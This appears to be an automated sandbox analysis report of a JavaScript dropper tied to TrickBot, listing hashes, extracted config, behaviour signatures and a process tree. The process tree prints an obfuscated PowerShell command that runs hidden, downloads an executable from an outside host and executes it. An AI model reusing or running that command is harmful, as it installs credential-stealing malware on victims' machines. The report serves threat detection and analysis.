Analysis
- max time kernel: 33s
- max time network: 150s
- platform: windows10_x64
- resource: win10v20201028
- submitted: 13-01-2021 06:51
- Static task: static1
- Behavioral task: behavioral1
- Sample: wGGlWA9kvQ.js
- Resource: win7v20201028
General
- Target: wGGlWA9kvQ.js
- Size: 30KB
- MD5: 71e84623c9f780a2ae34c49964a1d4fd
- SHA1: 8bab366961bf4363c13b169f086c959ff8515e85
- SHA256: 4bdc0f495dfb6d2425fd712ccdda2d1943c700e3b780c37c1c147462a30c9e30
- SHA512: f4cd7ccd1bf213e3262e4268b0247466b31e3bed3b3877a54b24e58d6710b6f1e83dce581d6d88ab544382cd6559fca2955e83657fd7801d0852fd00497327eb
Malware Config
- Extracted: http://dralex.smartwebsitedesign.com/local.php
- Extracted: trickbot
  - 100010
  - rob35
  - autorunName: pwgrab
Signatures
- Blocklisted process makes network request (1 IoCs)
  Processes:
  - flow 12 | pid 2820 | powershell.exe
- Executes dropped EXE (1 IoCs)
  Processes:
  - pid 2920 | TempNeX26.exe
- Suspicious behavior: EnumeratesProcesses (3 IoCs)
  Processes:
  - pid 2820 | powershell.exe (listed 3 times)
- Suspicious use of AdjustPrivilegeToken (1 IoCs)
  Processes:
  - Token: SeDebugPrivilege | pid 2820 | powershell.exe
- Suspicious use of WriteProcessMemory (7 IoCs)
  Processes:
  - PID 744 wrote to memory of 2212 | pid 744 | wscript.exe | target process cmd.exe (listed 2 times)
  - PID 2212 wrote to memory of 2820 | pid 2212 | cmd.exe | target process powershell.exe (listed 2 times)
  - PID 2212 wrote to memory of 2920 | pid 2212 | cmd.exe | target process TempNeX26.exe (listed 3 times)
Processes
- C:\Windows\system32\wscript.exe
  wscript.exe C:\Users\Admin\AppData\Local\Temp\wGGlWA9kvQ.js
  - Suspicious use of WriteProcessMemory
  - C:\Windows\System32\cmd.exe
    "C:\Windows\System32\cmd.exe" /c pOwEr^shEll -ex^ecution^pol^icy b^ypa^ss -n^oprof^ile -w h^idd^en $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','%temp%NeX26.exe'); & %temp%NeX26.exe & toMsRYPvmFupWNT
    - Suspicious use of WriteProcessMemory
    - C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
      pOwErshEll -executionpolicy bypass -noprofile -w hidden $v1='Net.W'; $v2='ebClient'; $var = (New-Object $v1$v2); $var.Headers['User-Agent'] = 'Google Chrome'; $var.downloadfile('http://dralex.smartwebsitedesign.com/local.php','C:\Users\Admin\AppData\Local\TempNeX26.exe');
      - Blocklisted process makes network request
      - Suspicious behavior: EnumeratesProcesses
      - Suspicious use of AdjustPrivilegeToken
    - C:\Users\Admin\AppData\Local\TempNeX26.exe
      C:\Users\Admin\AppData\Local\TempNeX26.exe
      - Executes dropped EXE
      - C:\Windows\system32\cmd.exe
        C:\Windows\system32\cmd.exe
Network
MITRE ATT&CK Matrix
Downloads
- C:\Users\Admin\AppData\Local\TempNeX26.exe
  - MD5: 2377e8d85d1c3271e8eeab035f158eca
  - SHA1: 25e7161fe88e96d8f2e53523e36e978ff3c13563
  - SHA256: dcb300ddb882699c560279dfc67ddb6be50a98bf34fef9e44fd2eb55675baebd
  - SHA512: 34eccf16c4c81673a6033a4627b4606762fad74104e6cd1e9291f0ecc797a87cd14e95c3a3cdc75479f912a5167908b8365dc604bd9ef12c4aa4ff5137ce734c
- memory/2212-2-0x0000000000000000-mapping.dmp
- memory/2820-3-0x0000000000000000-mapping.dmp
- memory/2820-4-0x00007FFF6D290000-0x00007FFF6DC7C000-memory.dmp (Filesize: 9.9MB)
- memory/2820-5-0x00000264CF4E0000-0x00000264CF4E1000-memory.dmp (Filesize: 4KB)
- memory/2820-6-0x00000264E9C40000-0x00000264E9C41000-memory.dmp (Filesize: 4KB)
- memory/2920-7-0x0000000000000000-mapping.dmp
- memory/3644-10-0x0000000000000000-mapping.dmp